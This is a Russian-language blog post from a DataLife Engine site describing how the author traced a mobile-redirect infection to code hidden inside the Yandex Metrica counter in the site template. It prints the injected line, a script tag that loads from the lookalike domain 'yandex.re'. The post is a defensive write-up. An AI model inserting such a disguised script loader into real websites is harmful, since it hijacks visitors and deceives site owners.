PomoRde.NET

Официальный сайт

Безопасность DataLife Engine

Мобильный редирект на сайте DLE. Как найти корень зла?

22 апрель, 2017 0
Недавно столкнулся с проблемой мобильного редиректа. Как же они достали эти редиректы. Куда не сунешься, везде пытаются на*бать. Как говорил Черномырдин «Никогда такого не было и вот опять».

Сначала нам говорили, что просто код ставишь, и мы платим много и стабильно. Потом нам начали предлагать баннеры. За эти баннеры платили хорошо, но за них банили ПС. И по итогу мы получили взломы сайтов и внедрение код в сайт насильно.

Все логично. Реклама приносит хорошие деньги. Но веб-мастера не хотят попадать постоянно под бан. Разумеется, нужно придумать или красивые отговорки, типа все работают и всех банят, но наш код суперпрограммисты писали и нас еще, ни разу не банили. Ну, или в нашем случае, закинуть код незаметно для веб мастера. Вот и я столкнулся с неудачниками и кодом редиректа мобильных пользователей.

Как я нашел мобильный редирект

Как всегда стал вопрос, что делать первым делом. Разумеется, я обратился к айболиту, это просто и быстро. Просканировал онлайн инструментом. Результат был нулевой. После этого я просканировал скриптом. Скрипт показал много всякого, но не показал, то, что действительно нужно. У айболита такое бывает. Видит угрозу в обычных файлах скрипта.

Я после этого обновил свой DLE. Кстати про нуленые версии, криворукими и хромыми, можно будет отдельно написать. После обновления, я опять таки результата не видел. На мобильном телефоне при заходе на мой сайт я увидел урл «login-s.com». В доменной зоне могу ошибиться. Я пытался найти этот домен в БД, в файлах движка. В итоге я не нашел не скрипта, не домена.

После этого я просто взял шаблон DLE и установил его на сайте. Просто левый шаблон, на котором ничего настроено не было. И тут я ахнул. Редиректа нет. Вернул шаблон и начал копать.

Все было бы можно еще долго обсасывать. Но я не буду тянуть. Код я нашел в коде Яндекс Метрики. Код был красиво вставлен.

Вот код:
<script type="text/javascript" src="//yandex.re"></script>


Как мы видим, код в Яндекс Метрике смотрелся очень естественно. Я видел этот код, но не особо придавал значению. Но когда я в шаблоне убрал счетчики и увидел, что редиректа нет, я был в странном состоянии. Но когда уже знал корень зла, вычислить скрипт было просто.

Я писал статью, исключительно для того что бы эти лошадиные гривы зарабатывали меньше. Кто не следит за сайтом, кормит шарлатанов. Всем удачного удаления мобильного редиректа!
Прокомментировать
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent
Введите код с картинки:*
Кликните на изображение чтобы обновить код, если он неразборчив